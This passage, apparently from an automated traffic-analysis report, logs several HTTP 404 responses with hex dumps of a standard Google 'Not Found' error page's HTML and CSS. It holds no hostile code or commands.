70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 